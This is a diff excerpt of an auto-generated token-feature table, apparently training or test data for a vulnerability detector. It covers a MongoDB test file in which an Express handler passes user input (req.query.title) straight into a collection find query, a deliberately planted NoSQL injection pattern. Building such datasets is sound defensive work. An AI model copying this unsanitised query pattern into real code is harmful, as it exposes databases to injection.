autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:50:60:50:62 | err | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:50:65:50:66 | db | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:50:65:50:66 | db | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:50:65:50:66 | db | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:50:65:50:66 | db | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:50:65:50:66 | db | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:50:65:50:66 | db | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:50:65:50:66 | db | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:50:65:50:66 | db | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:50:65:50:66 | db | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:50:65:50:66 | db | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:51:11:51:13 | doc | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:51:11:51:13 | doc | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:51:11:51:13 | doc | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:51:11:51:13 | doc | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:51:11:51:13 | doc | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:51:11:51:36 | doc | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:51:11:51:36 | doc | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:51:11:51:36 | doc | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:51:11:51:36 | doc | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:51:11:51:36 | doc | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:51:11:51:36 | doc = d ... ('doc') | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:51:11:51:36 | doc = d ... ('doc') | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:51:11:51:36 | doc = d ... ('doc') | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:51:11:51:36 | doc = d ... ('doc') | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:51:11:51:36 | doc = d ... ('doc') | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:51:17:51:18 | db | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:51:17:51:18 | db | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:51:17:51:18 | db | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:51:17:51:18 | db | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:51:17:51:18 | db | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:51:17:51:29 | db.collection | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:51:17:51:29 | db.collection | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:51:17:51:29 | db.collection | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:51:17:51:29 | db.collection | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:51:17:51:29 | db.collection | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:51:17:51:36 | db.collection('doc') | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:51:17:51:36 | db.collection('doc') | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:51:17:51:36 | db.collection('doc') | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:51:17:51:36 | db.collection('doc') | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:51:17:51:36 | db.collection('doc') | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:51:17:51:36 | exceptional return of db.collection('doc') | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:51:17:51:36 | exceptional return of db.collection('doc') | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:51:17:51:36 | exceptional return of db.collection('doc') | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:51:17:51:36 | exceptional return of db.collection('doc') | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:51:17:51:36 | exceptional return of db.collection('doc') | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:51:20:51:29 | collection | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:51:20:51:29 | collection | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:51:20:51:29 | collection | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:51:20:51:29 | collection | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:51:20:51:29 | collection | fileImports | ./dbo.js body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:51:31:51:35 | 'doc' | CalleeFlexibleAccessPath | db.collection | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:51:31:51:35 | 'doc' | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:51:31:51:35 | 'doc' | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | @@ -1706,6 +9151,31 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:51:31:51:35 | 'doc' | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:51:31:51:35 | 'doc' | fileImports | ./dbo.js body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:51:31:51:35 | 'doc' | receiverName | db | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:54:7:54:9 | doc | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:54:7:54:9 | doc | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:54:7:54:9 | doc | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:54:7:54:9 | doc | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:54:7:54:9 | doc | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:54:7:54:14 | doc.find | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:54:7:54:14 | doc.find | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:54:7:54:14 | doc.find | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:54:7:54:14 | doc.find | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:54:7:54:14 | doc.find | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:54:7:54:21 | doc.find(query) | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:54:7:54:21 | doc.find(query) | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:54:7:54:21 | doc.find(query) | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:54:7:54:21 | doc.find(query) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:54:7:54:21 | doc.find(query) | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:54:7:54:21 | exceptional return of doc.find(query) | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:54:7:54:21 | exceptional return of doc.find(query) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:54:7:54:21 | exceptional return of doc.find(query) | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:54:7:54:21 | exceptional return of doc.find(query) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:54:7:54:21 | exceptional return of doc.find(query) | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:54:11:54:14 | find | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:54:11:54:14 | find | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:54:11:54:14 | find | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:54:11:54:14 | find | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:54:11:54:14 | find | fileImports | ./dbo.js body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:54:16:54:20 | query | CalleeFlexibleAccessPath | doc.find | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:54:16:54:20 | query | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:54:16:54:20 | query | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | @@ -1714,6 +9184,21 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:54:16:54:20 | query | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:54:16:54:20 | query | fileImports | ./dbo.js body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:54:16:54:20 | query | receiverName | doc | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:58:1:58:3 | app | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:58:1:58:3 | app | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:58:1:58:3 | app | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:58:1:58:8 | app.post | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:58:1:58:8 | app.post | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:58:1:58:8 | app.post | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:58:1:67:2 | app.pos ... \\t});\\n}) | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:58:1:67:2 | app.pos ... \\t});\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:58:1:67:2 | app.pos ... \\t});\\n}) | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:58:1:67:2 | exceptional return of app.pos ... \\t});\\n}) | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:58:1:67:2 | exceptional return of app.pos ... \\t});\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:58:1:67:2 | exceptional return of app.pos ... \\t});\\n}) | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:58:5:58:8 | post | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:58:5:58:8 | post | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:58:5:58:8 | post | fileImports | ./dbo.js body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:58:10:58:26 | '/documents/find' | CalleeFlexibleAccessPath | app.post | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:58:10:58:26 | '/documents/find' | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:58:10:58:26 | '/documents/find' | calleeImports | express | @@ -1721,6 +9206,21 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:58:10:58:26 | '/documents/find' | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:58:10:58:26 | '/documents/find' | fileImports | ./dbo.js body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:58:10:58:26 | '/documents/find' | receiverName | app | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:58:29:58:28 | MongoClient | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:58:29:58:28 | MongoClient | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:58:29:58:28 | MongoClient | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err client doc client db MASTER collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:58:29:58:28 | MongoClient | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:58:29:58:28 | MongoClient | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:58:29:58:29 | query | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:58:29:58:29 | query | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:58:29:58:29 | query | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err client doc client db MASTER collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:58:29:58:29 | query | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:58:29:58:29 | query | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:58:29:67:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:58:29:67:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:58:29:67:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err client doc client db MASTER collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:58:29:67:1 | 'arguments' object of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:58:29:67:1 | 'arguments' object of anonymous function | fileImports | ./dbo.js body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:58:29:67:1 | (req, r ... \\n\\t});\\n} | CalleeFlexibleAccessPath | app.post | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:58:29:67:1 | (req, r ... \\n\\t});\\n} | InputArgumentIndex | 1 | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:58:29:67:1 | (req, r ... \\n\\t});\\n} | calleeImports | express | @@ -1728,11 +9228,125 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:58:29:67:1 | (req, r ... \\n\\t});\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:58:29:67:1 | (req, r ... \\n\\t});\\n} | fileImports | ./dbo.js body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:58:29:67:1 | (req, r ... \\n\\t});\\n} | receiverName | app | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:58:29:67:1 | exceptional return of anonymous function | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:58:29:67:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:58:29:67:1 | exceptional return of anonymous function | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err client doc client db MASTER collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:58:29:67:1 | exceptional return of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:58:29:67:1 | exceptional return of anonymous function | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:58:29:67:1 | return of anonymous function | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:58:29:67:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:58:29:67:1 | return of anonymous function | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err client doc client db MASTER collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:58:29:67:1 | return of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:58:29:67:1 | return of anonymous function | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:58:30:58:32 | req | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:58:30:58:32 | req | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:58:30:58:32 | req | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:58:30:58:32 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:58:30:58:32 | req | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err client doc client db MASTER collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:58:30:58:32 | req | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err client doc client db MASTER collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:58:30:58:32 | req | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:58:30:58:32 | req | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:58:30:58:32 | req | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:58:30:58:32 | req | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:58:35:58:37 | res | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:58:35:58:37 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:58:35:58:37 | res | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err client doc client db MASTER collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:58:35:58:37 | res | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:58:35:58:37 | res | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:59:8:59:12 | query | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:59:8:59:12 | query | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:59:8:59:12 | query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:59:8:59:12 | query | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err client doc client db MASTER collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:59:8:59:12 | query | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err client doc client db MASTER collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:59:8:59:12 | query | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:59:8:59:12 | query | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:59:8:59:12 | query | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:59:8:59:17 | query | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:59:8:59:17 | query | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:59:8:59:17 | query | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err client doc client db MASTER collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:59:8:59:17 | query | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:59:8:59:17 | query | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:59:8:59:17 | query = {} | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:59:8:59:17 | query = {} | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:59:8:59:17 | query = {} | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err client doc client db MASTER collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:59:8:59:17 | query = {} | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:59:8:59:17 | query = {} | fileImports | ./dbo.js body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:59:16:59:17 | {} | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:59:16:59:17 | {} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:59:16:59:17 | {} | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err client doc client db MASTER collection doc doc find query | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:59:16:59:17 | {} | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:59:16:59:17 | {} | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:60:2:60:6 | query | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:60:2:60:6 | query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:60:2:60:6 | query | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err client doc client db MASTER collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:60:2:60:6 | query | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:60:2:60:6 | query | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:60:2:60:12 | query.title | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:60:2:60:12 | query.title | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:60:2:60:12 | query.title | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err client doc client db MASTER collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:60:2:60:12 | query.title | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:60:2:60:12 | query.title | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:60:2:60:30 | query.t ... y.title | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:60:2:60:30 | query.t ... y.title | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:60:2:60:30 | query.t ... y.title | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err client doc client db MASTER collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:60:2:60:30 | query.t ... y.title | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:60:2:60:30 | query.t ... y.title | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:60:8:60:12 | title | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:60:8:60:12 | title | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:60:8:60:12 | title | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err client doc client db MASTER collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:60:8:60:12 | title | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:60:8:60:12 | title | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:60:16:60:18 | req | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:60:16:60:18 | req | contextSurroundingFunctionParameters | (req, res) | +| 